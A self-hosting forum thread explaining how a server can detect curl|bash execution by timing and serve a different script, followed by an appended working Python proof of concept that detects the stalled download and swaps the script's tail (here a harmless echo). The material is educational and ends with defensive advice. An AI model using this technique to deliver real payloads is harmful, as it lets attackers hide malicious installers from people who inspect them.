this post was submitted on 23 Feb 2026

Selfhosted

I set up a quick demonstration to show the risks of curl|bash and how a bad actor could potentially hide a malicious script that appears safe.

It's nothing new or groundbreaking, but I figure it never hurts to have another reminder.

[–] deadbeef79000@lemmy.nz 7 points 3 months ago (2 children)

Does curl send a different useragent when it's piped?

Searching for those words just vomits 'hOW to SeT cUrL's UseRaGenT' blog spam.

[–] Flipper@feddit.org 20 points 3 months ago* (last edited 3 months ago) (1 children)

It's timing based. When a script is piped to it, bash executes each line completely before taking the next line from the input. Curl has a limited output buffer.

  1. An operation that takes a long time, like a sleep or, if you want it less obvious, a download, an unzip operation, apt update, etc.
  2. Fill the buffer with more bash commands.
  3. Measure on the server if at some point curl stops downloading the script.
  4. Serve a malicious payload.

[–] deadbeef79000@lemmy.nz 3 points 3 months ago

Oh that is clever.

[–] qupada@fedia.io 5 points 3 months ago

Not that I know of, which means I can only assume it'll be a timing-based attack.

With strategic use of sleep statements in the script you should stand a pretty good chance of detecting the HTTP download blocking while the script execution is paused.

If you were already shipping the kind of script that unpacks a binary payload from the tail end of the file and executes it, it's well within the realm of possibility to swap it for a different one.
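
The server-side detection that Flipper's four steps and qupada's comment both describe, as an added example that is not part of the thread and not anyone's production code: a small HTTP server that pads the script with harmless comment lines after a slow step and watches whether its socket writes stall. If a write blocks for longer than a threshold, nobody is draining the connection (bash is busy with `sleep`, curl is blocked on its full stdout pipe), so the server serves a different tail. The client side is simulated in-process: a reader that pauses at the `sleep` line stands in for the curl|bash pipeline, and a reader that drains to EOF stands in for `curl -o install.sh`. The port, script text, padding sizes, timeout and the harmless "swapped" line are all constructed for the demo; the only real mechanism is the blocked write.

```python
import socket
import threading
import time

# Constructed script pieces. The `sleep` stands in for any slow step (download,
# unzip, apt update): bash stops reading its stdin while the step runs, curl
# then blocks on the full stdout pipe and stops draining the TCP socket, so
# the server's writes stall. That stall is the only signal the server needs.
HTTP_HEAD = (b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n"
             b"Connection: close\r\n\r\n")
SCRIPT_HEAD = b"#!/bin/sh\necho 'installing...'\nsleep 5\n"
PADDING = (b"# " + b"x" * 61 + b"\n") * 256       # 16 KiB of harmless comment lines
PADDING_ROUNDS = 64                               # up to 1 MiB, well past kernel buffers
BENIGN_TAIL = b"echo 'benign install finished'\n"
SWAPPED_TAIL = b"echo 'payload swapped: client stalled mid-download'\n"  # harmless stand-in
STALL_TIMEOUT = 1.0    # seconds a write may block before the server calls it a stall
SOCK_BUF = 16 * 1024   # small kernel buffers so the stall surfaces within 1 MiB


def handle_client(conn: socket.socket) -> bool:
    """Serve one request; return True if the tail was swapped because of a stall."""
    stalled = False
    with conn:
        conn.recv(4096)                           # consume the HTTP request
        conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SOCK_BUF)
        conn.sendall(HTTP_HEAD + SCRIPT_HEAD)
        conn.settimeout(STALL_TIMEOUT)
        for _ in range(PADDING_ROUNDS):
            try:
                conn.sendall(PADDING)
            except socket.timeout:                # write blocked: nobody is reading
                stalled = True
                break
        conn.settimeout(None)
        # A timed-out sendall may have stopped mid comment line; the leading
        # newline terminates it so the tail still parses as its own line.
        conn.sendall(b"\n" + (SWAPPED_TAIL if stalled else BENIGN_TAIL))
    return stalled


def start_server() -> int:
    """Start the server on a random loopback port in a daemon thread; return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def accept_loop() -> None:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle_client, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def fetch(port: int, piped: bool, pause: float = 3.0) -> bytes:
    """Simulated client. piped=False reads to EOF like `curl -o install.sh`;
    piped=True stops reading at the `sleep` line for `pause` seconds, which is
    what the curl|bash pipeline looks like from the server's point of view."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, SOCK_BUF)  # also disables autotuning
    sock.connect(("127.0.0.1", port))
    sock.sendall(b"GET /install.sh HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n")
    lines = []
    with sock, sock.makefile("rb") as f:
        while f.readline() not in (b"\r\n", b""):  # skip the response headers
            pass
        for line in f:
            lines.append(line)
            if piped and line.startswith(b"sleep"):
                time.sleep(pause)
    return b"".join(lines)


if __name__ == "__main__":
    port = start_server()
    print("curl -o style client, last line:", fetch(port, piped=False).splitlines()[-1])
    print("curl | bash style client, last line:", fetch(port, piped=True).splitlines()[-1])
```

Run as a script and the two simulated clients end up with different last lines from the same URL. The buffer sizes are shrunk with SO_SNDBUF/SO_RCVBUF so the stall shows up after a few tens of KiB; against default Linux buffers with autotuning a real server would have to pad with considerably more before its writes block, which is what Flipper's "fill the buffer" step is about. The caveat for defenders follows directly from the technique: fetching the same URL a second time with `curl -o` to inspect it returns the benign version, so saving the script first, reading it, and only then running it is the order that actually helps.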